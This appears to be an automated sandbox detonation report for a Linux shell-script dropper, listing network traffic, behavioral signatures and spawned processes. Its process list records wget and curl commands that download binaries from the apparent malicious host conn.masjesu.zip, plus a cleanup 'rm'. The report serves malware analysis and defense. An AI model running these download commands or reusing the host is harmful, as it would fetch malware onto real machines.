| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.20:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-21 01:58
Reported
2024-10-21 02:01
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
23s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |